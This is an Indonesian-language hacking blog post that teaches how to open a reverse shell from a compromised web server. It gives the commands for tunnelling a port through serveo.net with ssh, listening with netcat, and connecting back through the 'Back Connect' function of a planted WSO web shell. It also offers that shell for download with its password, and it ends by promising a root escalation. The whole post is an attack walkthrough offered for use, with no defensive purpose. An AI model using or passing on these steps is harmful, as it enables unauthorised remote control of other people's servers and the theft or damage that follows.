BACK CONNECT WITH SERVEO


assalamualaikum wr.wb

hai kak ketemu lagi dengan saya CYBERSCRY kali ini saya akan share tutorial BACK CONNECT / PORT FORWARDING menggunakan SERVEO
PERL ON ( karena script Back Connet dalam shell nya menggunakan Script Perl )

biasanya sih orang orang back connect menggunakan NGROK , menurut saya sih lebih enakan menggunakan SERVEO karena lebih efisien , sebelumnya juga saya sudah jelaskan tentang SERVEO dan kelebihan SERVEO disini http://www.lamonganxploiter.blogspot.com/2018/03/serveo-alternatif-ngrok.html


nah kita langsung saja ya

buka tab terminal

$ pkg install openssh
$ ssh -R 4949:localhost:4444 serveo.net
(kita menggunakan port forward 4949 dan local port 4444 , bisa kalian ubah se unik mungkin supaya tidak sama di pakai orang lain)

itu di forward IP ke 195.201.91.242 dan PORT 4949 LIHAT GAMBAR
( 195.201.91.242 : 4949 untuk digunakan BACK CONNECT nya nanti di dalam shell )



setelah itu kita buka tab baru untuk me listen forwarding nya menggunakan netcat
$ nc -lnvp 4444
( 4444 adalah local port untuk me listen port forwarding nya )

saya menggunakan linux jadi netcat sudah ada . jika anda menggunakan Android atau Windows anda harus Pasang netcat terlebih dahulu langsung aja search & download di google  , jika sudah ada langsung lanjut



sekarang kita masuk shell , kalau saya recomended BACK CONNECT menggunakan shell WSO tampilannya seperti di bawah ini , ( shell aman anti logger bisa di cek sendiri )

shell WSO ( anti logger slow aja ) DOWNLOAD
pass : root


tekan NETWORK di shell seperti gambar yang saya lingkari merah



langsung saja isi kolom Back Connect sesuai dengan hasil forward SERVEO tadi [ Server 195.201.91.242 dan Port 4949 ] Using dari C di ubah menjadi Perl dan klik SUBMIT
( lihat pada gambar di bawah )


Kita kembali ke terminal kita cek hasilnya jika berhasil di back connect maka seperti gambar di bawah ini

untuk lebih lanjut bisa cek dengan command

$ uname -a

maka akan muncul nama server web nya jika berhasil seperti gambar di bawah


BACK CONNECT BERHASIL :)

TINGGAL ROOT NYA SAJA  COOMING SOON  :V



semoga bermanfaat
wassalamualaikum wr.wb

Komentar

Postingan populer dari blog ini

Cara Menyimpan Vidio Youtube Ke Galeri

Tutorial Cara Download Video Yang Hanya Bisa Streaming

Kojima Natsuki 1st Photobook SOCO SOCO Full Scans PB